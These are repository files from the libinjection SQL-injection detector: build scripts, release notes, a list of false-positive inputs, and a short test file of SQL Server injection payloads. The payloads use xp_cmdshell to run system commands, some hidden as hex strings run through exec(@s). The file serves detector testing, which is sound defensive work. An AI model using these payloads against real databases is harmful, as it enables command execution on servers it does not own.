- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
- [x] code coverage online using [coveralls.io](https://coveralls.io/github/client9/libinjection)
LICENSE
=============
Copyright (c) 2012-2016 Nick Galbreath
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
license. See [COPYING](/COPYING) for details.
EMBEDDING
=============
The [src](https://github.com/client9/libinjection/tree/master/src)
directory contains everything, but you only need to copy the following
into your source tree:
* [src/libinjection.h](/src/libinjection.h)
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
* [COPYING](/COPYING)

View file

@ -0,0 +1,33 @@
# libinjection release howto
Comments and improvements welcome.
## Update the internal version number
in `src/libinjection_sqli.c` edit the definition
```c
#define LIBINJECTION_VERSION "3.9.1"
```
## Update the CHANGELOG.md file
There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
## test and commit
Something like this
```sh
make test
git commit -m 'VERSION'
```
## run ./tags.sh
This will get the version number from the file above and create a local
and remote tag.
## HELP!
I would be great to dump a src tarball on github releases.

View file

@ -0,0 +1,20 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
make -e check

20
libinjection/configure-clang.sh Executable file
View file

@ -0,0 +1,20 @@
#!/bin/sh
set -e
#
# adjust as needed for your clang setup
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
# stdout and stdin definitions
#
make clean
export CC=clang
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
make -e check

View file

@ -0,0 +1,16 @@
#!/bin/sh
set -e
#
# See https://wiki.debian.org/Hardening for details
#
# -Wno-padded padding can change by OS/version this check is really
# for embedded systems so it's ok to skip
#
# -Wno-covered-switch-default Don't warn if we have a switch that
# covers all of an enum AND we have a default. enums are only loosely
# typed, it's good to have a default: assert(0) in case someone does
# a bad cast, etc also this conflicts with GCC checks.
#
make clean
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
make -e

11
libinjection/configure-gcov.sh Executable file
View file

@ -0,0 +1,11 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
make -e

View file

@ -0,0 +1,9 @@
#!/bin/sh
set -e
#
# gprof build
#
make clean
export CFLAGS="-O2 -pg -ansi"
make -e

View file

@ -0,0 +1,12 @@
Files in this directory are sample input for SQLi or false positives
Lines that are empty or start with `#` ignored. Otherwise they should
be URL-encoded "user input" as might be found in query string.
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
outliers).
The `false-positive.txt` file are inputs that in the process of
development where falsely marked as sqli.

View file

@ -0,0 +1,443 @@
#
# List of various inputs that failed and caused a false positive
#
24-7-TEAM
A-LAST-MINUTE
1/26/11
TRUE#LAST
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
NOT ALL WHO WANDER
ALL NATURAL SKIN CARE
DAD TO BE
UNIQUE TABLE RUNNER
AS FOR ME AND MY HOUSE
LOCK AND KEY
1 BY 1 INCH PILLOWS
SET WITH ENVELOPES
FROM TO TAG CHRISTMAS
3 BY 5 RECIPE CARDS
3 TO 6 MONTHS
BY ORDER OF THE MANAGEMENT
A IS FOR ADORABLE
WHERE IS GEORGE
KEY TO MY HEART
Y'ALL COME BACK NOW
1950's dresses
EC-2HM85288X8372881C
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
MATS 5" BY 7"
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
JACK-O'-LANTERN?
7 AND A HALF
7 FOR ALL MANKIND
5 AND A QUARTER BY 8 INCHES
40 AND FAB
6 KEY CHAR
3 FOR 20
F AND A NECKLACE
21 LONG IN
FD AND C COSMETIC COLORANT
2 OR 4 METAL BUTTONS
13 IS A LUCKY NUMBER
1 AND 1/2" BUTTON
"DARE TO BE AWESOME":
"ALASKA" + 1978
10 DOUBLE LOOP SETS
B IS FOR BLACK BY TATIANA SOROKA
DANCIN' LIKE A ROBOT ON FIRE
D AND D DICE
BE TRUE 2 U
B AND A PRINTS
"SWEATER DRESS" AND "CHRISTMAS"
SMALL "& SIGN
9-2-5 BLACK PUMPS
2-3/4 CELLO BAGS
30-30-60 INVITE
11-11-11 DAY POPPY
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
1-1/8 PLUGS
1 1/8 PLUGS
1&1/8 PLUGS
909-527-9247
+1 (917) 666-0987
(9178787873)
(junk)
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
DRESS SIZE 20" -PATTERN -BABY
"CROSS STITCH" -PDF -WOOL
DRESS WITH HAT 18';
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
IN ORDER TO USE SEARCH
BEGIN EACH DAY WITH LOVE
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
IF-9-86MDXMB1Z-FINBSB4WIDF-B
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
CHRISTMAS STOCKING "NOT" STUFFER
ORDER@ALLTHATSHEWANTS.US
ALL@MKSAT.NET
ALL NATURAL SHA
WHERE IS THE SHOW
"ALASKA" + 1978
SMALL "&" SIGN
50%2526%252339%253Bs
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
poem+'if'
CRAFT SHOW SET
DIARY WITH LOCK
CLIP ON READ
CLOCK WITH KEYS
THERE IS NOT PLACE LIKE HOME
BASE; SET SWAROVSKI
LED -(ZEPPELIN)
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
70" ROUND TABLE CLOTH
"CASE"
"RIGHT ON"
"NOT ALL WHO WANDER"
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
CAT2_GALLERY_20">ETSY</A
OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
ALLENTOWN, () PA UNITED STATES
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
GREEN...GREEN...GREENISH))) BY JULIA
BRIDAL SHOWER INVITATION RECIPE CARDS'===
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
7/" ALUMINUM DISC
"MOD" "KITCHEN"
'M M L"\\ INITIALS
I' IS NOT A PLASTIC BAG
;EACH
;ON
IPHONE CASE 4 CASE
LAPTOP CASE 13 AND PHONE
IPAD -4 CASE
EP-2 CASE
ECID=15&
"///
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
2012 WRITE ON CALENDAR
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
MACBOOK CASE 13 -IPHONE -IPAD
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
LAPTOP CASE 14&#39;
"UNIQUE" PRINTABLE WEDDING
SILVER BRACELET "FORCE"
MOVIN' ON T-SHIRT
77921690/TURQUOISE-NATURAL-TU
"WRITE" DESIGN
"WHERE'S GEORGE"
"UNIQUE" PRINTABLE WEDDING
"UNION" BY ROBERT F
"TABLE"
"TRUE"
"ON" WHITE GREEN
"CREATE" STERLING GOLD
"CHANGE" NECKLACE
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
TAN (WATER RESISTANT INSULATED) MESSENGER
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
1/4"-1/2" WIDE RIBBON
1/4"-1" WIDE RIBBON
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
'-"8 TRACK" PLAYER
"AND WHEN THE KIDS ARE OLD ENOUGH"
"AND WHEN THE KIDS ARE OLD
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
"WOOD" AND "SIGN" AND "POLKA DOTS"
TAN
INFINITY LOOP SCARF
INFINITY LOOP
7 DEC 01
CARDS @ TWITTER
1;1;1;CONTROL;0;0;1;
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
7 AND A HALF
1060 OR 70S
18 CREATE GOLD
2 LOOP CONNECTORS
7 AND HALF
8 LOOP BOW
8 OR 9 WLV
00 AND 3
10.00 AND UNDER
102 TABLE CLOTH
10 OR LESS
TRUE-CUT
1.25 READ BUTTONS
"ON SALE ON SALE"
(NEW AND UNIQUE)
NEW AND UNIQUE)
1 REAL FEATHER AND 1 PETITE REAL SHELL
(DICKEY DICKIE*)
(1297-MR)
1297-MR),
(BRASS) PEN -BULLET
(CERAMIC OR POTTERY) MUGS
3/4 FEAR AND LOATHING
1 FEAR AND LOATHING
9/16 PLUGS AND TUNNELS
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
"RETURN ADDRESS LABELS" STICKER
"ON THE WAY"
"ON THE AIR" SIGN
20 SET 3/4
20 SET 3
"CREATE A CRITTER"
"INTO THE WILD"
"ON FIRE FOR" WHITE GREEN
"FOR BETTER OR WORSE"
(ANTIQUE, VINTAGE) QUILT
ANTIQUE, VINTAGE) QUILT
(TRUMPTON, IVOR, CLANGERS, POOH)
TRUMPTON, IVOR, CLANGERS, POOH)
OR-9-9WYTCZT313XRCN2UV62MBE1
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
BLAH <A HREF="FOO.HTML">FOO</A>
BLAH <A HREF="/FOO.HTML">FOO</A>
RSCHMIDT @FPMC-WILLMAR/COM
XSERVING"; ";PLATTER"; ";VINTAGE";
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
1.5 WITH 1/2 INCH LOOP END LOBSTER
60;S MOD DRESSES
7" #2 CIRCULAR NEEDLE
9/PLUGS AND TUNNELS
9/16PLUGS AND TUNNELS
"NOT ON FACEBOOK"
"#2 MOM"
80%25 ACRYLIC AND 20%25 WOOL
35%25 COTTON AND 65%25 POLYESTER.
5685587||ORDER=||SECTION_ID=||PAGE=2
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
BAMBOO CHARCOAL SOAP 1 '#
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
BOOKMAR';[K]]
WOOL AND ACRYLIC FOR SOFTNESS
01/DEC/2011:20:45:25
0;1;0;1;0
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
WOMEN';S ART DEC
DO OR NOT DO, THERE IS NO
ABC AND 123 WALL DEC
1.5 WITH 1/2 INCH LOOP END
"NOT FOR SALE"
"IS" STAMP
"LIKE" STAMP
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
1950' AND 60'S WOMEN'S COATS WITH FAKE
FOO; BAR 1+2+3
WO;DCAT[JPTPGRA][
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
0=[]'
"AS FOR ME AND MY
"EXIT, PURSUED B
"EXIT, PURSUED BY
4%27%2BX%2B4%27%2BWOOD
48%22%2BX%2B48%22%2BMODERN%2BART
90-%2B6%2BINCH
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
%22MOD%22%20%22
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
DO%20OR%20NOT%20DO
DO%20OR%20NOT%20DO%2C
9%216%2BEARINGS
%22NOT+GAY+AS+I
%22+-+%22MAGAZINE%22
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
%27-%228
%27-%228%20TRACK%22
%27-%228%20TRACK%20PL
2%20got%20%40AOL.COM
L%3BIN%20TABLE%20RUNNER
OW%3BCAST%20IRON%20TRIVETS
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
SET%208%20-MINI%20AS
1/4%22-1/2RIBBON
1/4%22-1/RIBBON
PHILLIPKEEGAN-777-%40HOTMAIL.COM
AUG%2B15%2BKEYS
%22foo%22+AND+%22bar%22+AND
%22foo%22+AND+%22bar%22
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
FOO+BAR%27%23+BLAH
5%2F8%2BLOOP
CONNECTORS+%2B+2-PRONG
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
%2BIPHONE%2B4%2BCASE
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
THING%2B1%2BAND%2BTHING%2B2
1Q9D819XMTILZVG1BOBY27-4-ROW
NOT+AS+SAD+AS+I+USED+TO+BE
NOT+AS+SAD+AS+I
IPHONE%2B4%2BCASE%2BRUSSIAN
COPPER%2B20%2BROUND
CASE+FOR+KINDLE+WITH+KEYBOARD
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
BIRTHDAY%2B12%2BMONTH%2B
6R2OS3JNSM-48-IN-0ZENVYLUJJL
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
GALLERY%3D1%3D5
I+%3C3+%3C3
I+%3C3+%3C3+THE+DOCTOR
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
-3-B39RBBO58YMVIHEVAUZBS-6TF
.75+%22+X+1.5%22
"SIGNAL LOCK"
3 TABLE LAMP WITH FLOWERS
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
1950 UNION MADE
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
SHELL IS 65 AND 35 POLY COTTON BLEND
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
5EOR-5MDKFIKK50HAHCPYPUVLG-2
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
5683190/TARGET="_BLANK"
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
# some base64 things?
zzh7W_krs4jSNwVV2TssQsSbOj--
1611-IioXXIG1ti8rspL2vbXFy--
1611/IioXXIG1ti8rspL2vbXFy--
Mosaic "Table top"
# Used in HTTP headers, e.g. Accept: */*
*/*
"Dr. Who" and coffee
"rose gold" necklace 14
"flagging" -american -festive --peace -prayer -america -stripes -straws
shabby "and white
"3 1'/3
"*"
necklace length 16" or 18"
4 pcs- (5003-BK) 14mm Black
"Keys"
"dec"
'countdown calendar" and "disney:
1950 or 1960
black and "shower curtain"
dad and keychain and "loved by"
if all else fails call grandma
case 13"
12.5 x 12.5&quot;
O'connors UNION selected a few friendsf from a
O'connors UNION selected a few friendsf from
O'connors UNION selected a few friendsf fr
O' UNION selected a few friends
O'connors UNION selected a few friends
1 I like having true friends
I like having true friends
I having true friends
I was having true friends
1 having
"1--"
'1--'
"1--
'1--
1 collate these union documents
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
# from https://github.com/client9/libinjection/issues/49
1,(1)
Toronto, ON, Canada - (YYZ)
1,1--
(1)-x
1 function (1)
'/1x-
# technically x OR 1
#x|x||1
select 'and'
x/void(1)
select x from y where
x/*
1x(((
1),(1
x, @x, @x
#
1; exec will create the case 7
`
1234`
junk <a href="../">foo.com</a>
# bogus
1alert(1)
foo 'null' bar
User(foo),junk
User(login_name),Images(url_170x135)
mr and mrs table sign
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
foo or bar add 1
Apt is gated; call when you get here, and we'll come down to get it.
DaVi - Open and Close Your Blinds With Your Phone!
Foo and 80&#039;s Foo / Bar
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
Same as reward #1 however
foobar sent you 1 message about
4.7" & iPhone 6 Plus 5.5
Family and friends having meal outdoors
<table width="99%" border="0" cellpadding="1"'
8-bit Limit (BRK)
3rd space(s)
Ink and White Out 2 in 1 Pen
Reality check (2016)
Please select pair #1

View file

@ -0,0 +1,30 @@
# https://twitter.com/ru_raz0r/status/750311113435283456
#
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
username'declare @s varchar (8000); ...
username'DECLARE @find varchar(30) = 'Man%'
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
